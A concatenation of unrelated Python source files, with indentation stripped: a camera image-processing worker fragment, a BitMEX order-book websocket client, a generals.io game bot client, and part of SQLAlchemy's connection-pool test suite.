top = getValueFromArea(Vector(x,y - step), Vector(step * 2, 0))
bottom = getValueFromArea(Vector(x,y + step), Vector(step * 2, 0))
left = getValueFromArea(Vector(x - step,y), Vector(0, step * 2))
right = getValueFromArea(Vector(x + step,y), Vector(0, step * 2))
min_value = min(top, bottom, left, right)
key_direction = None
if min_value < threshold and min_value > 0.0:
if (top == min_value):
key_direction = Key.UP
elif (bottom == min_value):
key_direction = Key.DOWN
elif (left == min_value):
key_direction = Key.LEFT
elif (right == min_value):
key_direction = Key.RIGHT
if not (key_direction == None):
addPixel(center, size, key_direction)
clearArea(center, size)
if (time.time() - start_time > 1.0):
print cycles, time.time() - start_time
return results
def yImageWorker(pipe):
main_conn, worker_conn = pipe
while True:
data = worker_conn.recv()
if data == ImageProcess.END_MESSAGE:
break;
result = processYImage(data.data)
worker_conn.send((data.timestamp, result))
class ImageProcess(object):
END_MESSAGE = 'END'
def __init__(self):
EventDispatcher().add_event_listener(YImageEvent.TYPE, self.onYImageEvent)
self._main1_conn, self._worker1_conn = Pipe()
self._worker1_ready = True
self._worker1 = Process(target=yImageWorker, args=((self._main1_conn, self._worker1_conn),))
self._worker1.daemon = True
self._worker1.start()
self._main2_conn, self._worker2_conn = Pipe()
self._worker2_ready = True
self._worker2 = Process(target=yImageWorker, args=((self._main2_conn, self._worker2_conn),))
self._worker2.daemon = True
self._worker2.start()
def onYImageEvent(self, event):
if self._worker1_ready:
self._worker1_ready = False
self._main1_conn.send(event.data()[0])
if self._worker2_ready:
self._worker2_ready = False
self._main2_conn.send(event.data()[1])
def stop(self):
self._main1_conn.send(ImageProcess.END_MESSAGE)
while self._main1_conn.poll():
self._main1_conn.recv()
self._main2_conn.send(ImageProcess.END_MESSAGE)
while self._main2_conn.poll():
self._main2_conn.recv()
self._worker1.join()
self._worker2.join()
def update(self):
if self._main1_conn.poll():
data = self._main1_conn.recv()
self._worker1_ready = True
EventDispatcher().dispatch_event(LatencyEvent(LatencyEvent.P1_PROCESSING, data[0]))
EventDispatcher().dispatch_event(CameraResultEvent(CameraResultEvent.P1, data[1]))
if self._main2_conn.poll():
data = self._main2_conn.recv()
self._worker2_ready = True
EventDispatcher().dispatch_event(LatencyEvent(LatencyEvent.P2_PROCESSING, data[0]))
EventDispatcher().dispatch_event(CameraResultEvent(CameraResultEvent.P2, data[1]))
|
bitmex_book.py
|
# -*- coding: utf-8 -*-
# - OrderBook Websocket Thread -
# 🦏 **** quan.digital **** 🦏
# authors: canokaue & thomgabriel
# date: 03/2020
# kaue.cano@quan.digital
# Simplified implementation of connecting to BitMEX websocket for streaming realtime orderbook data.
# Optimized for OrderBookL2 handling using Red and Black Binary Search Trees - https://www.programiz.com/dsa/red-black-tree
# Originally developed for Quan Digital's Whale Watcher project - https://github.com/quan-digital/whale-watcher
# Code based on stock Bitmex API connectors - https://github.com/BitMEX/api-connectors/tree/master/official-ws/python/bitmex_websocket.py
# As well as pmaji's GDAX OrderBook thread - https://github.com/pmaji/crypto-whale-watching-app/blob/master/gdax_book.py
# The Websocket offers a bunch of data as raw properties right on the object.
# On connect, it synchronously asks for a push of all this data then returns.
# Docs: https://www.bitmex.com/app/wsAPI
import websocket
import threading
import traceback
from time import sleep
import json
import logging
import urllib
from decimal import Decimal
from bintrees import RBTree
from operator import itemgetter
from tqdm import tqdm
# Websocket timeout in seconds
CONN_TIMEOUT = 5
# It's recommended not to grow a table larger than 200. Helps cap memory usage.
MAX_TABLE_LEN = 200
class BitMEXBook:
def __init__(self, endpoint="https://www.bitmex.com/api/v1", symbol='XBTUSD'):
'''Connect to the websocket and initialize data stores.'''
self.logger = logging.getLogger(__name__)
self.logger.debug("Initializing WebSocket.")
self.endpoint = endpoint
self.symbol = symbol
self.data = {}
self.keys = {}
self.exited = False
self._asks = RBTree()
self._bids = RBTree()
# We can subscribe right in the connection querystring, so let's build that.
# Subscribe to all pertinent endpoints
wsURL = self.__get_url()
self.logger.debug("Connecting to %s" % wsURL)
self.__connect(wsURL, symbol)
self.logger.info('Connected to WS, waiting for partials.')
# Connected. Wait for partials
self.__wait_for_symbol(symbol)
self.logger.info('Got all market data. Starting.')
def init(self):
self.logger.debug("Initializing WebSocket...")
self.data = {}
self.keys = {}
self.exited = False
wsURL = self.__get_url()
self.logger.debug("Connecting to URL -- %s" % wsURL)
self.__connect(wsURL, self.symbol)
self.logger.info('Connected to WS, waiting for partials.')
# Connected. Wait for partials
self.__wait_for_symbol(self.symbol)
self.logger.info('Got all market data. Starting.')
def error(self, err):
self._error = err
self.logger.error(err)
#self.exit()
def __del__(self):
self.exit()
def reset(self):
self.logger.warning('Websocket resetting...')
self.ws.close()
self.logger.info('Weboscket closed.')
self.logger.info('Restarting...')
self.init()
def exit(self):
'''Call this to exit - will close websocket.'''
self.exited = True
self.ws.close()
### Main orderbook function
def get_current_book(self):
result = {
'asks': [],
'bids': []
}
for ask in self._asks:
try:
# There can be a race condition here, where a price point is removed
# between these two ops
this_ask = self._asks[ask]
except KeyError:
continue
for order in this_ask:
result['asks'].append([order['price'],(order['size']/Decimal(order['price'])), order['id']]) #(order['size']/Decimal(order['price']))
# Same procedure for bids
for bid in self._bids:
try:
this_bid = self._bids[bid]
except KeyError:
continue
for order in this_bid:
result['bids'].append([order['price'], (order['size']/Decimal(order['price'])), order['id']]) #(order['size']/Decimal(order['price']))
return result
# -----------------------------------------------------------------------------------------
# ----------------------RBTrees Handling---------------------------------------------------
# -----------------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------------
# Get current minimum ask price from tree
def get_ask(self):
return self._asks.min_key()
# Get ask given id
def get_asks(self, id):
return self._asks.get(id)
# Remove ask form tree
def remove_asks(self, id):
self._asks.remove(id)
# Insert ask into tree
def set_asks(self, id, asks):
self._asks.insert(id, asks)
# Get current maximum bid price from tree
def get_bid(self):
return self._bids.max_key()
# Get bid given id
def get_bids(self, id):
return self._bids.get(id)
# Remove bid form tree
def remove_bids(self, id):
self._bids.remove(id)
# Insert bid into tree
def set_bids(self, id, bids):
self._bids.insert(id, bids)
# Add order to out watched orders
def add(self, order):
order = {
'id': order['id'], # Order id data
'side': order['side'], # Order side data
'size': Decimal(order['size']), # Order size data
'price': order['price'] # Order price data
}
if order['side'] == 'Buy':
bids = self.get_bids(order['id'])
if bids is None:
bids = [order]
else:
bids.append(order)
self.set_bids(order['id'], bids)
else:
asks = self.get_asks(order['id'])
if asks is None:
asks = [order]
else:
asks.append(order)
self.set_asks(order['id'], asks)
# Order is done, remove it from watched orders
def remove(self, order):
oid = order['id']
if order['side'] == 'Buy':
bids = self.get_bids(oid)
if bids is not None:
bids = [o for o in bids if o['id'] != order['id']]
if len(bids) > 0:
self.set_bids(oid, bids)
else:
self.remove_bids(oid)
else:
asks = self.get_asks(oid)
if asks is not None:
asks = [o for o in asks if o['id'] != order['id']]
if len(asks) > 0:
self.set_asks(oid, asks)
else:
self.remove_asks(oid)
# Updating order price and size
def change(self, order):
new_size = Decimal(order['size'])
# Bitmex updates don't come with price, so we use the id to match it instead
oid = order['id']
if order['side'] == 'Buy':
bids = self.get_bids(oid)
if bids is None or not any(o['id'] == order['id'] for o in bids):
return
index = list(map(itemgetter('id'), bids)).index(order['id'])
bids[index]['size'] = new_size
self.set_bids(oid, bids)
else:
asks = self.get_asks(oid)
if asks is None or not any(o['id'] == order['id'] for o in asks):
return
index = list(map(itemgetter('id'), asks)).index(order['id'])
asks[index]['size'] = new_size
self.set_asks(oid, asks)
tree = self._asks if order['side'] == 'Sell' else self._bids
node = tree.get(oid)
if node is None or not any(o['id'] == order['id'] for o in node):
return
# -----------------------------------------------------------------------------------------
# ----------------------WS Private Methods-------------------------------------------------
# -----------------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------------
def __connect(self, wsURL, symbol):
'''Connect to the websocket in a thread.'''
self.logger.debug("Starting thread")
self.ws = websocket.WebSocketApp(wsURL,
on_message=self.__on_message,
on_close=self.__on_close,
on_open=self.__on_open,
on_error=self.__on_error)
self.wst = threading.Thread(target=lambda: self.ws.run_forever())
self.wst.daemon = True
self.wst.start()
self.logger.debug("Started thread")
# Wait for connect before continuing
conn_timeout = CONN_TIMEOUT
while (not self.ws.sock or not self.ws.sock.connected) and conn_timeout:
sleep(1)
conn_timeout -= 1
if not conn_timeout:
self.logger.error("Couldn't connect to WS! Exiting.")
# self.exit()
# raise websocket.WebSocketTimeoutException('Couldn\'t connect to WS! Exiting.')
self.reset()
def __get_url(self):
'''
Generate a connection URL. We can define subscriptions right in the querystring.
Most subscription topics are scoped by the symbol we're listening to.
'''
symbolSubs = ["orderBookL2"]
subscriptions = [sub + ':' + self.symbol for sub in symbolSubs]
urlParts = list(urllib.parse.urlparse(self.endpoint))
urlParts[0] = urlParts[0].replace('http', 'ws')
urlParts[2] = "/realtime?subscribe={}".format(','.join(subscriptions))
return urllib.parse.urlunparse(urlParts)
def __wait_for_symbol(self, symbol):
'''On subscribe, this data will come down. Wait for it.'''
pbar = tqdm(total=160)
# Wait until data reaches our RBTrees
while self._asks.is_empty() and self._bids.is_empty():
sleep(0.1)
pbar.update(3)
pbar.close()
def __send_command(self, command, args=None):
'''Send a raw command.'''
if args is None:
args = []
self.ws.send(json.dumps({"op": command, "args": args}))
def __on_message(self, message):
'''Handler for parsing WS messages.'''
message = json.loads(message)
# self.logger.debug(json.dumps(message))
table = message['table'] if 'table' in message else None
action = message['action'] if 'action' in message else None
# table = message.get("table")
# action = message.get("action")
try:
# RBTrees for orderBook
if table == 'orderBookL2':
# For every order received
try:
for order in message['data']:
if action == 'partial':
self.logger.debug('%s: adding partial %s' % (table, order))
self.add(order)
elif action == 'insert':
self.logger.debug('%s: inserting %s' % (table, order))
self.add(order)
elif action == 'update':
self.logger.debug('%s: updating %s' % (table, order))
self.change(order)
elif action == 'delete':
self.logger.debug('%s: deleting %s' % (table, order))
self.remove(order)
else:
raise Exception("Unknown action: %s" % action)
except:
self.logger.error('Error handling RBTrees: %s' % traceback.format_exc())
# Uncomment this to watch RBTrees evolution in real time
# self.logger.info('==============================================================')
# self.logger.info('=============================ASKS=============================')
# self.logger.info('==============================================================')
# self.logger.info(self._asks)
# self.logger.info('==============================================================')
# self.logger.info('=============================BIDS=============================')
# self.logger.info('==============================================================')
# self.logger.info(self._bids)
except:
self.logger.error(traceback.format_exc())
def __on_error(self, error):
'''Called on fatal websocket errors. We exit on these.'''
if not self.exited:
self.logger.error("Error : %s" % error)
raise websocket.WebSocketException(error)
def __on_open(self):
'''Called when the WS opens.'''
self.logger.debug("Websocket Opened.")
def __on_close(self):
'''Called on websocket close.'''
self.logger.info('Websocket Closed')
# Utility method for finding an item in the store.
# When an update comes through on the websocket, we need to figure out which item in the array it is
# in order to match that item.
# Helpfully, on a data push (or on an HTTP hit to /api/v1/schema), we have a "keys" array. These are the
# fields we can use to uniquely identify an item. Sometimes there is more than one, so we iterate through
# all provided keys.
def find_by_keys(keys, table, matchData):
for item in table:
if all(item[k] == matchData[k] for k in keys):
return item
|
generals.py
|
'''
Generals.io Automated Client - https://github.com/harrischristiansen/generals-bot
Client Adopted from @toshima Generals Python Client - https://github.com/toshima/generalsio
'''
import logging
import json
import threading
import time
from websocket import create_connection, WebSocketConnectionClosedException
import map
_ENDPOINT = "ws://botws.generals.io/socket.io/?EIO=3&transport=websocket"
class Generals(object):
def __init__(self, userid, username, mode="1v1", gameid=None,
force_start=True):
logging.debug("Creating connection")
self._ws = create_connection(_ENDPOINT)
self._lock = threading.RLock()
logging.debug("Starting heartbeat thread")
_spawn(self._start_sending_heartbeat)
logging.debug("Joining game")
self._send(["star_and_rank", userid])
self._send(["set_username", userid, username])
if mode == "private":
if gameid is None:
raise ValueError("Gameid must be provided for private games")
self._send(["join_private", gameid, username, userid])
elif mode == "1v1":
self._send(["join_1v1", username, userid])
elif mode == "team":
self._send(["join_team", username, userid])
elif mode == "ffa":
self._send(["play", username, userid])
else:
raise ValueError("Invalid mode")
self._send(["set_force_start", gameid, force_start])
self._seen_update = False
self._move_id = 1
self._start_data = {}
self._stars = []
self._map = []
self._cities = []
def send_chat(self, msg):
# 42["chat_message", "game_148479560460049JgP8O3TPIwDNpgAEBB", "ship", null, ""]
if not self._seen_update:
raise ValueError("Cannot chat before game starts")
if len(msg) < 2:
return
self._send(["chat_message", self._start_data['chat_room'], msg, None, ""])
def move(self, y1, x1, y2, x2, move_half=False):
if not self._seen_update:
raise ValueError("Cannot move before first map seen")
cols = self._map.cols
a = y1 * cols + x1
b = y2 * cols + x2
self._send(["attack", a, b, move_half, self._move_id])
self._move_id += 1
def get_updates(self):
while True:
try:
msg = self._ws.recv()
except WebSocketConnectionClosedException:
break
if not msg.strip():
break
# ignore heartbeats and connection acks
if msg in {"3", "40"}:
continue
# remove numeric prefix
while msg and msg[0].isdigit():
msg = msg[1:]
msg = json.loads(msg)
if not isinstance(msg, list):
continue
if msg[0] == "error_user_id":
raise ValueError("Already in game")
elif msg[0] == "game_start":
logging.info("Game info: {}".format(msg[1]))
self._start_data = msg[1]
elif msg[0] == "game_update":
yield self._make_update(msg[1])
elif msg[0] in ["game_won", "game_lost"]:
yield self._make_result(msg[0], msg[1])
break
elif msg[0] == "chat_message":
chat_msg = msg[2]
if "username" in chat_msg:
print("From %s: %s" % (chat_msg["username"],chat_msg["text"]))
else:
print("Message: %s" % chat_msg["text"])
else:
logging.info("Unknown message type: {}".format(msg))
def close(self):
self._ws.close()
def _make_update(self, data):
if not self._seen_update:
self._seen_update = True
self._map = map.Map(self._start_data, data)
return self._map
return self._map.update(data)
def _make_result(self, update, data):
return self._map.updateResult(update)
def _start_sending_heartbeat(self):
while True:
try:
with self._lock:
self._ws.send("2")
except WebSocketConnectionClosedException:
break
time.sleep(0.1)
def _send(self, msg):
try:
with self._lock:
self._ws.send("42" + json.dumps(msg))
except WebSocketConnectionClosedException:
pass
def _spawn(f):
t = threading.Thread(target=f)
t.daemon = True
t.start()
|
test_pool.py
|
import threading
import time
from sqlalchemy import pool, select, event
import sqlalchemy as tsa
from sqlalchemy import testing
from sqlalchemy.testing.util import gc_collect, lazy_gc
from sqlalchemy.testing import eq_, assert_raises, is_not_, is_
from sqlalchemy.testing.engines import testing_engine
from sqlalchemy.testing import fixtures
import random
from sqlalchemy.testing.mock import Mock, call, patch, ANY
import weakref
import collections
join_timeout = 10
def MockDBAPI(): # noqa
def cursor():
return Mock()
def connect(*arg, **kw):
return Mock(cursor=Mock(side_effect=cursor))
def shutdown(value):
if value:
db.connect = Mock(side_effect=Exception("connect failed"))
else:
db.connect = Mock(side_effect=connect)
db.is_shutdown = value
db = Mock(
connect=Mock(side_effect=connect),
shutdown=shutdown,
is_shutdown=False)
return db
class PoolTestBase(fixtures.TestBase):
def setup(self):
pool.clear_managers()
self._teardown_conns = []
def teardown(self):
for ref in self._teardown_conns:
conn = ref()
if conn:
conn.close()
@classmethod
def teardown_class(cls):
pool.clear_managers()
def _with_teardown(self, connection):
self._teardown_conns.append(weakref.ref(connection))
return connection
def _queuepool_fixture(self, **kw):
dbapi, pool = self._queuepool_dbapi_fixture(**kw)
return pool
def _queuepool_dbapi_fixture(self, **kw):
dbapi = MockDBAPI()
return dbapi, pool.QueuePool(
creator=lambda: dbapi.connect('foo.db'),
**kw)
class PoolTest(PoolTestBase):
def test_manager(self):
manager = pool.manage(MockDBAPI(), use_threadlocal=True)
c1 = manager.connect('foo.db')
c2 = manager.connect('foo.db')
c3 = manager.connect('bar.db')
c4 = manager.connect("foo.db", bar="bat")
c5 = manager.connect("foo.db", bar="hoho")
c6 = manager.connect("foo.db", bar="bat")
assert c1.cursor() is not None
assert c1 is c2
assert c1 is not c3
assert c4 is c6
assert c4 is not c5
def test_manager_with_key(self):
dbapi = MockDBAPI()
manager = pool.manage(dbapi, use_threadlocal=True)
c1 = manager.connect('foo.db', sa_pool_key="a")
c2 = manager.connect('foo.db', sa_pool_key="b")
c3 = manager.connect('bar.db', sa_pool_key="a")
assert c1.cursor() is not None
assert c1 is not c2
assert c1 is c3
eq_(
dbapi.connect.mock_calls,
[
call("foo.db"),
call("foo.db"),
]
)
def test_bad_args(self):
manager = pool.manage(MockDBAPI())
manager.connect(None)
def test_non_thread_local_manager(self):
manager = pool.manage(MockDBAPI(), use_threadlocal=False)
connection = manager.connect('foo.db')
connection2 = manager.connect('foo.db')
self.assert_(connection.cursor() is not None)
self.assert_(connection is not connection2)
@testing.fails_on('+pyodbc',
"pyodbc cursor doesn't implement tuple __eq__")
@testing.fails_on("+pg8000", "returns [1], not (1,)")
def test_cursor_iterable(self):
conn = testing.db.raw_connection()
cursor = conn.cursor()
cursor.execute(str(select([1], bind=testing.db)))
expected = [(1, )]
for row in cursor:
eq_(row, expected.pop(0))
def test_no_connect_on_recreate(self):
def creator():
raise Exception("no creates allowed")
for cls in (pool.SingletonThreadPool, pool.StaticPool,
pool.QueuePool, pool.NullPool, pool.AssertionPool):
p = cls(creator=creator)
p.dispose()
p2 = p.recreate()
assert p2.__class__ is cls
mock_dbapi = MockDBAPI()
p = cls(creator=mock_dbapi.connect)
conn = p.connect()
conn.close()
mock_dbapi.connect.side_effect = Exception("error!")
p.dispose()
p.recreate()
def test_threadlocal_del(self):
self._do_testthreadlocal(useclose=False)
def test_threadlocal_close(self):
self._do_testthreadlocal(useclose=True)
def _do_testthreadlocal(self, useclose=False):
dbapi = MockDBAPI()
for p in pool.QueuePool(creator=dbapi.connect,
pool_size=3, max_overflow=-1,
use_threadlocal=True), \
pool.SingletonThreadPool(
creator=dbapi.connect,
use_threadlocal=True):
c1 = p.connect()
c2 = p.connect()
self.assert_(c1 is c2)
c3 = p.unique_connection()
self.assert_(c3 is not c1)
if useclose:
c2.close()
else:
c2 = None
c2 = p.connect()
self.assert_(c1 is c2)
self.assert_(c3 is not c1)
if useclose:
c2.close()
else:
c2 = None
lazy_gc()
if useclose:
c1 = p.connect()
c2 = p.connect()
c3 = p.connect()
c3.close()
c2.close()
self.assert_(c1.connection is not None)
c1.close()
c1 = c2 = c3 = None
# extra tests with QueuePool to ensure connections get
# __del__()ed when dereferenced
if isinstance(p, pool.QueuePool):
lazy_gc()
self.assert_(p.checkedout() == 0)
c1 = p.connect()
c2 = p.connect()
if useclose:
c2.close()
c1.close()
else:
c2 = None
c1 = None
lazy_gc()
self.assert_(p.checkedout() == 0)
def test_info(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c = p.connect()
self.assert_(not c.info)
self.assert_(c.info is c._connection_record.info)
c.info['foo'] = 'bar'
c.close()
del c
c = p.connect()
self.assert_('foo' in c.info)
c.invalidate()
c = p.connect()
self.assert_('foo' not in c.info)
c.info['foo2'] = 'bar2'
c.detach()
self.assert_('foo2' in c.info)
c2 = p.connect()
is_not_(c.connection, c2.connection)
assert not c2.info
assert 'foo2' in c.info
def test_rec_info(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c = p.connect()
self.assert_(not c.record_info)
self.assert_(c.record_info is c._connection_record.record_info)
c.record_info['foo'] = 'bar'
c.close()
del c
c = p.connect()
self.assert_('foo' in c.record_info)
c.invalidate()
c = p.connect()
self.assert_('foo' in c.record_info)
c.record_info['foo2'] = 'bar2'
c.detach()
is_(c.record_info, None)
is_(c._connection_record, None)
c2 = p.connect()
assert c2.record_info
assert 'foo2' in c2.record_info
def test_rec_unconnected(self):
# test production of a _ConnectionRecord with an
# initially unconnected state.
dbapi = MockDBAPI()
p1 = pool.Pool(
creator=lambda: dbapi.connect('foo.db')
)
r1 = pool._ConnectionRecord(p1, connect=False)
assert not r1.connection
c1 = r1.get_connection()
is_(c1, r1.connection)
def test_rec_close_reopen(self):
# test that _ConnectionRecord.close() allows
# the record to be reusable
dbapi = MockDBAPI()
p1 = pool.Pool(
creator=lambda: dbapi.connect('foo.db')
)
r1 = pool._ConnectionRecord(p1)
c1 = r1.connection
c2 = r1.get_connection()
is_(c1, c2)
r1.close()
assert not r1.connection
eq_(
c1.mock_calls,
[call.close()]
)
c2 = r1.get_connection()
is_not_(c1, c2)
is_(c2, r1.connection)
eq_(
c2.mock_calls,
[]
)
class PoolDialectTest(PoolTestBase):
def _dialect(self):
canary = []
class PoolDialect(object):
def do_rollback(self, dbapi_connection):
canary.append('R')
dbapi_connection.rollback()
def do_commit(self, dbapi_connection):
canary.append('C')
dbapi_connection.commit()
def do_close(self, dbapi_connection):
canary.append('CL')
dbapi_connection.close()
return PoolDialect(), canary
def _do_test(self, pool_cls, assertion):
mock_dbapi = MockDBAPI()
dialect, canary = self._dialect()
p = pool_cls(creator=mock_dbapi.connect)
p._dialect = dialect
conn = p.connect()
conn.close()
p.dispose()
p.recreate()
conn = p.connect()
conn.close()
eq_(canary, assertion)
def test_queue_pool(self):
self._do_test(pool.QueuePool, ['R', 'CL', 'R'])
def test_assertion_pool(self):
self._do_test(pool.AssertionPool, ['R', 'CL', 'R'])
def test_singleton_pool(self):
self._do_test(pool.SingletonThreadPool, ['R', 'CL', 'R'])
def test_null_pool(self):
self._do_test(pool.NullPool, ['R', 'CL', 'R', 'CL'])
def test_static_pool(self):
self._do_test(pool.StaticPool, ['R', 'R'])
class PoolEventsTest(PoolTestBase):
def _first_connect_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def first_connect(*arg, **kw):
canary.append('first_connect')
event.listen(p, 'first_connect', first_connect)
return p, canary
def _connect_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def connect(*arg, **kw):
canary.append('connect')
event.listen(p, 'connect', connect)
return p, canary
def _checkout_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def checkout(*arg, **kw):
canary.append('checkout')
event.listen(p, 'checkout', checkout)
return p, canary
def _checkin_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def checkin(*arg, **kw):
canary.append('checkin')
event.listen(p, 'checkin', checkin)
return p, canary
def _reset_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def reset(*arg, **kw):
canary.append('reset')
event.listen(p, 'reset', reset)
return p, canary
def _invalidate_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, 'invalidate', canary)
return p, canary
def _soft_invalidate_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, 'soft_invalidate', canary)
return p, canary
def _close_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, 'close', canary)
return p, canary
def _detach_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, 'detach', canary)
return p, canary
def _close_detached_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, 'close_detached', canary)
return p, canary
def test_close(self):
p, canary = self._close_event_fixture()
c1 = p.connect()
connection = c1.connection
rec = c1._connection_record
c1.close()
eq_(canary.mock_calls, [])
p.dispose()
eq_(canary.mock_calls, [call(connection, rec)])
def test_detach(self):
p, canary = self._detach_event_fixture()
c1 = p.connect()
connection = c1.connection
rec = c1._connection_record
c1.detach()
eq_(canary.mock_calls, [call(connection, rec)])
def test_detach_close(self):
p, canary = self._close_detached_event_fixture()
c1 = p.connect()
connection = c1.connection
c1.detach()
c1.close()
eq_(canary.mock_calls, [call(connection)])
def test_first_connect_event(self):
p, canary = self._first_connect_event_fixture()
p.connect()
eq_(canary, ['first_connect'])
def test_first_connect_event_fires_once(self):
p, canary = self._first_connect_event_fixture()
p.connect()
p.connect()
eq_(canary, ['first_connect'])
def test_first_connect_on_previously_recreated(self):
p, canary = self._first_connect_event_fixture()
p2 = p.recreate()
p.connect()
p2.connect()
eq_(canary, ['first_connect', 'first_connect'])
def test_first_connect_on_subsequently_recreated(self):
p, canary = self._first_connect_event_fixture()
p.connect()
p2 = p.recreate()
p2.connect()
eq_(canary, ['first_connect', 'first_connect'])
def test_connect_event(self):
p, canary = self._connect_event_fixture()
p.connect()
eq_(canary, ['connect'])
def test_connect_event_fires_subsequent(self):
p, canary = self._connect_event_fixture()
c1 = p.connect() # noqa
c2 = p.connect() # noqa
eq_(canary, ['connect', 'connect'])
def test_connect_on_previously_recreated(self):
p, canary = self._connect_event_fixture()
p2 = p.recreate()
p.connect()
p2.connect()
eq_(canary, ['connect', 'connect'])
def test_connect_on_subsequently_recreated(self):
p, canary = self._connect_event_fixture()
p.connect()
p2 = p.recreate()
p2.connect()
eq_(canary, ['connect', 'connect'])
def test_checkout_event(self):
p, canary = self._checkout_event_fixture()
p.connect()
eq_(canary, ['checkout'])
def test_checkout_event_fires_subsequent(self):
p, canary = self._checkout_event_fixture()
p.connect()
p.connect()
eq_(canary, ['checkout', 'checkout'])
def test_checkout_event_on_subsequently_recreated(self):
p, canary = self._checkout_event_fixture()
p.connect()
p2 = p.recreate()
p2.connect()
eq_(canary, ['checkout', 'checkout'])
def test_checkin_event(self):
p, canary = self._checkin_event_fixture()
c1 = p.connect()
eq_(canary, [])
c1.close()
eq_(canary, ['checkin'])
def test_reset_event(self):
p, canary = self._reset_event_fixture()
c1 = p.connect()
eq_(canary, [])
c1.close()
eq_(canary, ['reset'])
def test_soft_invalidate_event_no_exception(self):
p, canary = self._soft_invalidate_event_fixture()
c1 = p.connect()
c1.close()
assert not canary.called
c1 = p.connect()
dbapi_con = c1.connection
c1.invalidate(soft=True)
assert canary.call_args_list[0][0][0] is dbapi_con
assert canary.call_args_list[0][0][2] is None
def test_soft_invalidate_event_exception(self):
p, canary = self._soft_invalidate_event_fixture()
c1 = p.connect()
c1.close()
assert not canary.called
c1 = p.connect()
dbapi_con = c1.connection
exc = Exception("hi")
c1.invalidate(exc, soft=True)
assert canary.call_args_list[0][0][0] is dbapi_con
assert canary.call_args_list[0][0][2] is exc
def test_invalidate_event_no_exception(self):
p, canary = self._invalidate_event_fixture()
c1 = p.connect()
c1.close()
assert not canary.called
c1 = p.connect()
dbapi_con = c1.connection
c1.invalidate()
assert canary.call_args_list[0][0][0] is dbapi_con
assert canary.call_args_list[0][0][2] is None
def test_invalidate_event_exception(self):
p, canary = self._invalidate_event_fixture()
c1 = p.connect()
c1.close()
assert not canary.called
c1 = p.connect()
dbapi_con = c1.connection
exc = Exception("hi")
c1.invalidate(exc)
assert canary.call_args_list[0][0][0] is dbapi_con
assert canary.call_args_list[0][0][2] is exc
def test_checkin_event_gc(self):
p, canary = self._checkin_event_fixture()
c1 = p.connect()
eq_(canary, [])
del c1
lazy_gc()
eq_(canary, ['checkin'])
def test_checkin_event_on_subsequently_recreated(self):
p, canary = self._checkin_event_fixture()
c1 = p.connect()
p2 = p.recreate()
c2 = p2.connect()
eq_(canary, [])
c1.close()
eq_(canary, ['checkin'])
c2.close()
eq_(canary, ['checkin', 'checkin'])
def test_listen_targets_scope(self):
canary = []
def listen_one(*args):
canary.append("listen_one")
def listen_two(*args):
canary.append("listen_two")
def listen_three(*args):
canary.append("listen_three")
def listen_four(*args):
canary.append("listen_four")
engine = testing_engine(testing.db.url)
event.listen(pool.Pool, 'connect', listen_one)
event.listen(engine.pool, 'connect', listen_two)
event.listen(engine, 'connect', listen_three)
event.listen(engine.__class__, 'connect', listen_four)
engine.execute(select([1])).close()
eq_(
canary,
["listen_one", "listen_four", "listen_two", "listen_three"]
)
def test_listen_targets_per_subclass(self):
"""test that listen() called on a subclass remains specific to
that subclass."""
canary = []
def listen_one(*args):
canary.append("listen_one")
def listen_two(*args):
canary.append("listen_two")
def listen_three(*args):
canary.append("listen_three")
event.listen(pool.Pool, 'connect', listen_one)
event.listen(pool.QueuePool, 'connect', listen_two)
event.listen(pool.SingletonThreadPool, 'connect', listen_three)
p1 = pool.QueuePool(creator=MockDBAPI().connect)
p2 = pool.SingletonThreadPool(creator=MockDBAPI().connect)
assert listen_one in p1.dispatch.connect
assert listen_two in p1.dispatch.connect
assert listen_three not in p1.dispatch.connect
assert listen_one in p2.dispatch.connect
assert listen_two not in p2.dispatch.connect
assert listen_three in p2.dispatch.connect
p1.connect()
eq_(canary, ["listen_one", "listen_two"])
p2.connect()
eq_(canary, ["listen_one", "listen_two", "listen_one", "listen_three"])
def teardown(self):
# TODO: need to get remove() functionality
# going
pool.Pool.dispatch._clear()
class PoolFirstConnectSyncTest(PoolTestBase):
# test [ticket:2964]
@testing.requires.timing_intensive
def test_sync(self):
pool = self._queuepool_fixture(pool_size=3, max_overflow=0)
evt = Mock()
@event.listens_for(pool, 'first_connect')
def slow_first_connect(dbapi_con, rec):
time.sleep(1)
evt.first_connect()
@event.listens_for(pool, 'connect')
def on_connect(dbapi_con, rec):
evt.connect()
def checkout():
for j in range(2):
c1 = pool.connect()
time.sleep(.02)
c1.close()
time.sleep(.02)
threads = []
for i in range(5):
th = threading.Thread(target=checkout)
th.start()
threads.append(th)
for th in threads:
th.join(join_timeout)
eq_(
evt.mock_calls,
[
call.first_connect(),
call.connect(),
call.connect(),
call.connect()]
)
class DeprecatedPoolListenerTest(PoolTestBase):
@testing.requires.predictable_gc
@testing.uses_deprecated(r".*Use event.listen")
def test_listeners(self):
class InstrumentingListener(object):
def __init__(self):
if hasattr(self, 'connect'):
self.connect = self.inst_connect
if hasattr(self, 'first_connect'):
self.first_connect = self.inst_first_connect
if hasattr(self, 'checkout'):
self.checkout = self.inst_checkout
if hasattr(self, 'checkin'):
self.checkin = self.inst_checkin
self.clear()
def clear(self):
self.connected = []
self.first_connected = []
self.checked_out = []
self.checked_in = []
def assert_total(self, conn, fconn, cout, cin):
eq_(len(self.connected), conn)
eq_(len(self.first_connected), fconn)
eq_(len(self.checked_out), cout)
eq_(len(self.checked_in), cin)
def assert_in(
self, item, in_conn, in_fconn,
in_cout, in_cin):
eq_((item in self.connected), in_conn)
eq_((item in self.first_connected), in_fconn)
eq_((item in self.checked_out), in_cout)
eq_((item in self.checked_in), in_cin)
def inst_connect(self, con, record):
print("connect(%s, %s)" % (con, record))
assert con is not None
assert record is not None
self.connected.append(con)
